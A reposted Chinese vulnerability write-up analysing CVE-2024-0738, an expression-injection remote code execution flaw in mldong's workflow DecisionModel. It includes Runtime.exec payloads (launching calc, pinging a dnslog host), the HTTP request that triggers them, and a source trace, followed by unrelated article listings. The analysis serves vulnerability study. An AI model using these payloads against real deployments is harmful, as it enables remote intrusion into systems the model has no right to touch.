CVE-2024-0738 Mldong ExpressionEngine RCE漏洞分析

漏洞描述

A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

个人开源mldong 1.0中发现一个严重漏洞。此问题影响文件 com/mldong/modules/wf/engine/model/DecisionModel.java 的 ExpressionEngine 函数。这种操纵会导致代码注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。

相关参考

NVD - CVE-2024-0738icon-default.png?t=N7T8https://nvd.nist.gov/vuln/detail/CVE-2024-0738

https://github.com/biantaibao/mldong_RCE/blob/main/RCE.mdicon-default.png?t=N7T8https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md

mldong开源项目地址

mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎icon-default.png?t=N7T8https://gitee.com/mldong/mldong

漏洞发现点

在mldong项目中DecisionModel类里有一个exec方法,它似乎可以执行表达式

 这个ExpressionUtil.eval引起了我们的兴趣。

本地建立文件,测试这行代码是否存在表达式注入。

 (测试环境最好在本项目中,保持环境包的一致性)


import cn.hutool.extra.expression.ExpressionUtil;import java.util.HashMap;
import java.util.Map;public class Test {public static void main(String[] args) {String expression = "T(java.lang.Runtime).getRuntime().exec('calc')";Map<String, Object> context = new HashMap<>();context.put("a", 1);context.put("b", 2);context.put("c", 3);Object result = ExpressionUtil.eval(expression, context);System.out.println(result);}
}

技巧:
        1.通过这个包ExpressionUtil在网上找寻使用示例代码或使用手册,再凭经验修改相关参数为表达式payload以造成命令执行。
        2.表达式的payload可以网上输入关键字收集,比如搜索cn.hutool.extra.expression.ExpressionUtil 表达式注入 历史漏洞什么。
        3.有了足够多的payload就可以做模糊测试了

本机计算机弹出,项目的确存在RCE漏洞

找寻调用接口

发现了漏洞点,如何寻找调用的接口,这里提供了几个技巧(还有什么技巧,请大佬补充)
1,右键找相关函数的usages,逐个分析
2,打上断点,前端点击功能看看那个接口会卡住

我这里右键找exec的usages

public abstract class NodeModel extends BaseModel implements Action {private String layout;// 布局属性(x,y,w,h)// 输入边集合private List<TransitionModel> inputs = new ArrayList<TransitionModel>();// 输出边集合private List<TransitionModel> outputs = new ArrayList<TransitionModel>();private String preInterceptors; // 节点前置拦截器private String postInterceptors; // 节点后置拦截器/*** 由子类自定义执行方法* @param execution*/abstract void exec(Execution execution);@Overridepublic void execute(Execution execution) {// 0.设置当前节点模型execution.setNodeModel(this);// 1. 调用前置拦截器execPreInterceptors(execution);// 2. 调用子类的exec方法exec(execution);// 3. 调用后置拦截器execPostInterceptors(execution);}

再次右键找execute的usages...

后面我就遇到了很多困难,因为java的继承类 接口实现类需要挨个分析 也不排除重名现象。如果想分析到接口层,可得下一番功夫。

这里我们先跳过这一步,来到前端的功能页面寻找相关的线索。....

待漏洞复现完毕后 我们再分析接口的调用!

.....

漏洞复现

进入后台管理在流程设计页面中新增流程设计

右键 设置流程属性  

添加这样的流程

点击条件判断的框

准备payload 打dns

T(java.lang.Runtime).getRuntime().exec('ping xxxx.dnslog.cn')  

保存 部署 准备执行  

 来到流程定义开始执行

 顺便添几个 点击确定

查看dnslog结果

ok rce成功复现

接口调用分析

看看它调用了什么接口

 post数据参考

POST /api/wf/processDefine/startAndExecute HTTP/1.1
Host: 
Connection: close

{"processDefineId":"1749714638596308993","f_startTime":["2024-01-23 ",null],"f_endTime":["2024-01-25 ",null],"f_reasonType":2,"f_day":2.5,"f_title":"test"}

来到后端

@PostMapping("/wf/processDefine/startAndExecute")
@ApiOperation(value = "启动流程实例")
@SaCheckPermission(value = {"wf:processDefine:startAndExecute","wf:processDesign:listByType"}, mode = SaMode.OR)
public CommonResult<?> startAndExecute(@RequestBody Dict args) {Long processDefineId = args.getLong(FlowConst.PROCESS_DEFINE_ID_KEY);args.remove(FlowConst.PROCESS_DEFINE_ID_KEY);processInstanceService.startAndExecute(processDefineId,args);return CommonResult.ok();
}

 跟进startAndExecute

public class ProcessInstanceServiceImpl extends ServiceImpl<ProcessInstanceMapper, ProcessInstance> implements ProcessInstanceService {
...private final ProcessTaskMapper processTaskMapper;private final ProcessCcInstanceMapper processCcInstanceMapper;@Override@Transactional(rollbackFor = Exception.class)public void startAndExecute(Long processDefineId, Dict args) {String operator = LoginUserHolder.getUserId().toString();FlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);ProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId,operator,args);List<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(),new String[]{});// 取任务自动执行processTaskList.forEach(processTask -> {args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);});}
...
}

在方法中,首先获取当前登录用户的操作员 ID:

javaCopy CodeString operator = LoginUserHolder.getUserId().toString();

然后,获取 FlowEngine 实例:

javaCopy CodeFlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);

接下来,使用 flowEngine 实例的 startProcessInstanceById 方法启动一个流程实例,并传入 processDefineIdoperatorargs 参数:

javaCopy CodeProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId, operator, args);

然后,使用 flowEngine 实例的 processTaskService() 方法获取正在进行中的任务列表:

javaCopy CodeList<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(), new String[]{});

接下来,对任务列表进行遍历,并自动执行每个任务:

javaCopy CodeprocessTaskList.forEach(processTask -> {args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());flowEngine.executeProcessTask(processTask.getId(), FlowConst.AUTO_ID, args);
});

跟进 flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);

public class FlowEngineImpl implements FlowEngine {protected Configuration configuration;private ProcessDefineService processDefineService;private ProcessInstanceService processInstanceService;private ProcessTaskService processTaskService;
...@Override@Transactional(rollbackFor = Exception.class)public List<ProcessTask> executeProcessTask(Long processTaskId, String operator, Dict args) {Execution execution = execute(processTaskId,operator,args);if(execution == null) return Collections.emptyList();ProcessModel processModel = execution.getProcessModel();// 7. 根据流程任务名称获取对应的任务节点模型NodeModel nodeModel = processModel.getNode(execution.getProcessTask().getTaskName());// 8. 调用节点模型执行方法nodeModel.execute(execution);return execution.getProcessTaskList();}
...
}

这段代码首先调用 execute 方法来执行指定的流程任务,并将执行结果保存在一个 Execution 对象中。如果 execute 方法返回的 Execution 对象为 null,则直接返回一个空列表。

接着,代码从 Execution 对象中获取了当前任务所属的流程模型(ProcessModel 对象),并根据当前任务名称获取了对应的节点模型(NodeModel 对象)。最后,代码调用了该节点模型的 execute 方法来完成任务的执行。

需要注意的是,该方法使用了 @Transactional 注解来添加事务支持,保证代码在执行过程中出现异常时可以进行回滚。同时,该方法还使用了 Dict 类型的参数来传递一些额外的参数信息,以便在执行过程中进行相关操作。

 跟进Execution execution = execute(processTaskId,operator,args); 看看对参数的处理

public class FlowEngineImpl implements FlowEngine {protected Configuration configuration;private ProcessDefineService processDefineService;private ProcessInstanceService processInstanceService;private ProcessTaskService processTaskService;
.../*** 生成执行对象* @param processTaskId* @param operator* @param args* @return*/private Execution execute(Long processTaskId, String operator, Dict args) {// 1.1 根据id查询正在进行中的流程任务ProcessTask processTask = processTaskService.getById(processTaskId);if(processTask == null || !ProcessTaskStateEnum.DOING.getCode().equals(processTask.getTaskState())) {throw new JFlowException(WfErrEnum.NOT_FOUND_DOING_PROCESS_TASK);}// 1.2 判断是否可以执行任务if(!processTaskService.isAllowed(processTask,operator)) {// 当前参与者不能执行该流程任务throw new JFlowException(WfErrEnum.NOT_ALLOWED_EXECUTE);}// 2. 根据流程任务查询流程实例ProcessInstance processInstance = processInstanceService.getById(processTask.getProcessInstanceId());// 3. 根据流程实例查询流程定义ProcessDefine processDefine = processDefineService.getById(processInstance.getProcessDefineId());// 4. 将流程定义文件转成流程模型ProcessModel processModel = ModelParser.parse(processDefine.getContent());// 5. 将流程任务状态修改为已完成processTaskService.finishProcessTask(processTaskId,operator,args);processTask.setTaskState(ProcessTaskStateEnum.FINISHED.getCode());// 6. 根据流程定义、实例、任务构建执行参数对象Execution execution = new Execution();execution.setProcessModel(processModel);execution.setProcessInstance(processInstance);execution.setProcessInstanceId(processInstance.getId());execution.setProcessTask(processTask);execution.setProcessTaskId(processTaskId);execution.setOperator(operator);execution.setEngine(this);Dict processInstanceVariable = JSONUtil.toBean(processInstance.getVariable(),Dict.class);Dict newArgs = Dict.create();newArgs.putAll(processInstanceVariable);newArgs.putAll(args);execution.setArgs(newArgs);// 如果提交参数中存在f_前辍参数,则更新到流程实例变量中Dict addArgs = Dict.create();args.forEach((key,value)->{if(key.startsWith(FlowConst.FORM_DATA_PREFIX)) {addArgs.put(key,value);}});if(ObjectUtil.isNotEmpty(addArgs)) {processInstanceService.addVariable(processInstance.getId(), addArgs);}return execution;}
...
}

 得到execution对象,返回进入nodeModel.execute(execution);

public abstract class NodeModel extends BaseModel implements Action {private String layout;// 布局属性(x,y,w,h)// 输入边集合private List<TransitionModel> inputs = new ArrayList<TransitionModel>();// 输出边集合private List<TransitionModel> outputs = new ArrayList<TransitionModel>();private String preInterceptors; // 节点前置拦截器private String postInterceptors; // 节点后置拦截器
/*** 由子类自定义执行方法* @param execution*/
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {// 0.设置当前节点模型execution.setNodeModel(this);// 1. 调用前置拦截器execPreInterceptors(execution);// 2. 调用子类的exec方法exec(execution);// 3. 调用后置拦截器execPostInterceptors(execution);
}

进入exec方法,这就来到了触发漏洞点的地方

public class DecisionModel extends NodeModel {private String expr; // 决策表达式private String handleClass; // 决策处理类@Overridepublic void exec(Execution execution) {// 执行决策节点自定义执行逻辑boolean isFound = false;String nextNodeName = null;if(StrUtil.isNotEmpty(expr)) {Object obj = ExpressionUtil.eval(expr, execution.getArgs());//漏洞触发点nextNodeName = Convert.toStr(obj,"");} else if(StrUtil.isNotEmpty(handleClass)) {DecisionHandler decisionHandler = ReflectUtil.newInstance(handleClass);nextNodeName = decisionHandler.decide(execution);}for(TransitionModel transitionModel: getOutputs()){if (StrUtil.isNotEmpty(transitionModel.getExpr()) && Convert.toBool(ExpressionUtil.eval(transitionModel.getExpr(), execution.getArgs()), false)) {// 决策节点输出边存在表达式,则使用输出边的表达式,true则执行isFound = true;transitionModel.setEnabled(true);transitionModel.execute(execution);} else if(transitionModel.getTo().equalsIgnoreCase(nextNodeName)) {// 找到对应的下一个节点isFound = true;transitionModel.setEnabled(true);transitionModel.execute(execution);}}if(!isFound) {// 找不到下一个可执行路线throw new JFlowException(WfErrEnum.NOT_FOUND_NEXT_NODE);}}
}
总结

本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。

本次漏洞研究发的包有点复杂,就不附赠poc。有想法的小伙伴可以尝试一下

至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...

欢迎大佬评论区留言,

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/245255.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

微信授权登陆

1.官方网站&#xff1a;微信登录功能 / 网页应用授权用户信息变更 (qq.com) 2.登陆流程&#xff1a; 和登陆微信没关系&#xff0c;是用户的微信号&#xff0c;和我程序的程序编号&#xff08;微信给的 目前用的老师的&#xff09;&#xff0c;去请求微信的接口&#xff0c;微…

WPF多值转换器

背景&#xff1a;实现Slider拖动可以调整rgb 单转换器&#xff1a;WPF中数据绑定转换器Converter-CSDN博客 在View中&#xff1a; <StackPanel Orientation"Vertical"><Slider x:Name"slider_R" Minimum"0" Maximum"255" Wi…

Python教程:拆分多级目录的方法

前言 大家早好、午好、晚好吖 ❤ ~欢迎光临本文章 如果有什么疑惑/资料需要的可以点击文章末尾名片领取源码 实现多级目录差分&#xff0c;举例说明如下&#xff1a; 假设现有的目录结构如下&#xff1a;1、2、2.1、2.2、2.3、2.4、3、4、5、6、6.1、6.1.1、6.1.2、6.1.3、6…

antv/g6绘制数据流向图

antv/g6绘制数据流向图 前言接口模拟数据htmlts页面效果 前言 在业务开发中需要绘制数据流向图&#xff0c;由于echarts关系图的限制以及需求的特殊要求&#xff0c;转而使用antv/g6实现&#xff0c;本文以代码的方式实现数据流向需求以及节点分组,版本"antv/g6": “…

Javadoc的讲解使用

概述&#xff1a;JavaDoc 是用于生成 Java 代码文档的工具。通过编写 JavaDoc 注释&#xff0c;可以为代码中的类、接口、方法、字段等元素添加文档注释&#xff0c;这些注释将被 JavaDoc 工具解析并生成相应的 HTML 文档。 目录 讲解 使用 结果 讲解 下面是一些关于 Java…

MCU常用外设总线

目录 前言一、时钟与中断二、GPIO三、ADC四、定时器4.1 基本定时器4.2 通用定时器4.2.1 输入捕获4.2.2 输出比较 五、UART5.1 通讯的基本概念5.1.1 串行通讯与并行通讯5.1.2 全双工、半双工及单工通讯5.1.3 同步通讯与异步通讯5.1.4 通信速率 5.2 异步串口UART5.2.1 物理层5.2.…

如何使用iPhone或iPad上的二维码共享Wi-Fi密码?这里有详细步骤

你有没有想过在不泄露网络密码的情况下与客人共享你的家庭或工作Wi-Fi?你肯定不是第一个这样想的人,我们很高兴地通知你,多亏了以下这个的变通方法,你现在可以使用iPhone或iPad做到这一点。 通常,如果你想让其他人访问网络,你需要共享你的Wi-Fi密码。苹果通过引入与任何…

嵌入式-stm32-江科大-EXTI外部中断

文章目录 一&#xff1a;EXTI外部中断&#xff08;external interrupt&#xff09;1.1 STM32 中断系统1.2 STM32外部中断EXTI1.3 实验&#xff1a;对射式红外传感器计次1.31 编程感想 1.4 实验&#xff1a;旋转编码器计次1.41 编程感想 道友&#xff1a;没有永久的巅峰也没有永…

Influxdb系列(一)influxdb2.7.x的部署安装

一、influxdb的介绍 InfluxDB 是一种时序数据库&#xff0c;时序数据库通常被用在监控场景&#xff0c;比如运维和 IOT&#xff08;物联网&#xff09;领域。这类数据库旨在存储时序数据并实时处理它们。 比如。我们可以写一个程序将服务器上 CPU 的使用情况每隔 10 秒钟向 In…

JVM-初始JVM

什么是JVM JVM 全称是 Java Virtual Machine&#xff0c;中文译名 Java虚拟机。JVM 本质上是一个运行在计算机上的程序&#xff0c;他的职责是运行Java字节码文件。 Java源代码执行流程如下&#xff1a; JVM的功能 1 - 解释和运行 2 - 内存管理 3 - 即时编译 解释和运行 解释…

2024转行程序员的请注意:均月薪在40-70k

前言 2023年&#xff0c;对大多数行业来说都是不太好过的一年。 对程序员来说也是如此&#xff0c;很多粉丝朋友都在说android工作特别难找&#xff0c;一个岗位都是几千份简历…大家心里都是特别的焦虑&#xff0c;本以为2024年就业情况会有好转&#xff0c;但实际上并非如此…

《WebKit 技术内幕》学习之十三(1):移动WebKit

1 触控和手势事件 1.1 HTML5规范 随着电容屏幕的流行&#xff0c;触控操作变得前所未有的流行起来。时至今日&#xff0c;带有多点触控功能已经成为了移动设备的标准配置&#xff0c;基于触控的手势识别技术也获得巨大的发展&#xff0c;如使用两个手指来缩放应用的大小等。…

基于SSM的蛋糕甜品店管理系统(有报告)。Javaee项目。ssm项目。

演示视频&#xff1a; 基于SSM的蛋糕甜品店管理系统&#xff08;有报告&#xff09;。Javaee项目。ssm项目。 项目介绍&#xff1a; 采用M&#xff08;model&#xff09;V&#xff08;view&#xff09;C&#xff08;controller&#xff09;三层体系结构&#xff0c;通过Spring…

C++ 数论相关题目(欧拉函数、筛法求欧拉函数)

1、欧拉函数 给定 n 个正整数 ai &#xff0c;请你求出每个数的欧拉函数。 欧拉函数的定义 1∼N 中与 N 互质的数的个数被称为欧拉函数&#xff0c;记为 ϕ(N) 。 若在算数基本定理中&#xff0c;Npa11pa22…pamm &#xff0c;则&#xff1a; ϕ(N) Np1−1p1p2−1p2…pm−1p…

SpringBoot项目多数据源配置与MyBatis拦截器生效问题解析

在日常项目开发中&#xff0c;由于某些原因&#xff0c;一个服务的数据源可能来自不同的库&#xff0c;比如&#xff1a; 对接提供的中间库&#xff0c;需要查询需要的数据同步数据&#xff0c;需要将一个库的数据同步到另一个库&#xff0c;做为同步工具的服务对接第三方系统…

肺癌相关文献6

第十四篇 Classification of lung adenocarcinoma based on stemness scores in bulk and single cell transcriptomes IF&#xff1a;6.0 中科院分区:2区 生物学WOS分区&#xff1a;Q1被引次数&#xff1a; 4 背景&#xff1a;癌细胞具有无限期自我更新和增殖的能力[2]。在一…

JavaScript进阶:WebAPIs重点知识整理1

目录 1 DOM修改元素内容 2 DOM修改元素常见属性 3 修改元素样式属性 3.1 通过style修改元素样式 3.2 通过类名className修改元素样式 3.3 通过classList修改元素样式 4 操作表单元素属性 5 自定义属性 6 定时器 7 事件监听 7.1 点击事件 click 7.2 鼠mouseenter和移…

Laya3.0 相机使用

摄像机&#xff0c;是3D场景里边最经常使用的对象了。 官方文档&#xff1a;点击这里学习 1.投影 Projection 透视&#xff1a; 模拟人眼的视觉效果&#xff0c;近大远小。模拟物理世界的规律&#xff0c;将眼睛或相机抽象成一个点&#xff0c;此时视锥体内的物体投影到视平…

YOLO 自己训练一个模型

一、准备数据集 我的版本是yolov8 8.11 这个目录结构很重要 ultralytics-main | datasets|coco|train|val 二、训练 编写yaml 文件 # Train/val/test sets as 1) dir: path/to/imgs, 2) file: path/to/imgs.txt, or 3) list: [path/to/imgs1, path/to/imgs2, ..] path…

Java项目:基于SSM框架实现同城蔬菜配送管理系统(SSM+B/S架构+源码+数据库+毕业论文)

一、项目简介 本项目是一套ssm825基于SSM框架实现同城蔬菜配送管理系统&#xff0c;主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的Java学习者。 包含&#xff1a;项目源码、数据库脚本等&#xff0c;该项目附带全部源码可作为毕设使用。 项目都经过严格调试&…